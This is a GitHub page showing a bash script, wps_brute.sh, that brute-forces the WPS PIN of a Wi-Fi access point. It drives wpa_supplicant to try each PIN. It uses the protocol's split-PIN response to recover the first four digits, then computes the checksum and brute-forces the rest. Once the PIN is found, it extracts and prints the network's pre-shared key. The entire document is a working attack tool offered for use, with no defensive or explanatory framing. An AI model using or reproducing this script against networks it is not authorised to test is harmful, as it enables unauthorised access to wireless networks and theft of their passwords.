-
Notifications
You must be signed in to change notification settings - Fork 6
/
wps_brute.sh
executable file
·91 lines (84 loc) · 2.02 KB
/
wps_brute.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#!/bin/bash
RED='\x1b[31m'
GREEN='\x1b[32m'
GREY='\x1b[90m'
RESET='\x1b[0m'
bssid="$1"
[ -z "$IFACE" ] && IFACE=wlan0
[ -z "$TIMEOUT" ] && TIMEOUT=10
mkdir /tmp/wps_brute 2> /dev/null && chmod o+rw /tmp/wps_brute
shopt -s lastpipe
function connect(){
echo -e 'ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1' | sudo tee /tmp/wps_brute/wpa_supplicant.conf > /dev/null
{ sleep 1; sudo /opt/wpa_supplicant/wpa_cli wps_reg "$1" "$2" > /dev/null; } &
result='fail'
sudo timeout $TIMEOUT /opt/wpa_supplicant/wpa_supplicant -i $IFACE -c /tmp/wps_brute/wpa_supplicant.conf | while read line
do #echo "$line" >&2
if echo "$line" | grep -q 'msg='; then
if echo "$line" | grep -q 'msg=10'; then
result='half'
else
result='wrong'
fi
elif echo "$line" | grep -q -e 'CTRL-EVENT-DISCONNECTED' -e 'CTRL-EVENT-TERMINATING'; then
break
fi
done
#cat /tmp/wps_brute/wpa_supplicant.conf >&2
if cat /tmp/wps_brute/wpa_supplicant.conf | grep -q 'psk='; then
echo 'success'
else
echo "$result"
fi
}
function checksum(){
typeset -i pin="10#$1"
typeset -i accum=0
while [ $pin -gt 0 ]; do
accum+=$[3*($pin%10)]
pin=$[$pin/10]
accum+=$[$pin%10]
pin=$[$pin/10]
done
echo $[(10-accum%10)%10]
}
for p1 in {0000..9999}
do
p2='000'
chs=$(checksum $p1$p2)
pin=$p1$p2$chs
echo -ne $GREY"$pin\r"$RESET
result=$(connect "$bssid" "$pin")
case $result in
'half')
echo -e $GREEN"$p1"$RESET"$p2$chs"
break
;;
'wrong')
echo -e $RED"$p1"$RESET"$p2$chs"
;;
'fail')
echo ''
;;
esac
done
for p2 in {000..999}
do
chs=$(checksum $p1$p2)
pin=$p1$p2$chs
echo -ne $GREY"$pin\r"$RESET
result=$(connect "$bssid" "$pin")
case $result in
'success')
echo -e $GREEN"$pin"$RESET
cat /tmp/wps_brute/wpa_supplicant.conf | grep 'psk=' | awk '{print $1}'
break
;;
'wrong'|'half')
echo -e $GREEN"$p1"$RED"$p2"$RESET"$chs"
;;
'fail')
echo ''
;;
esac
done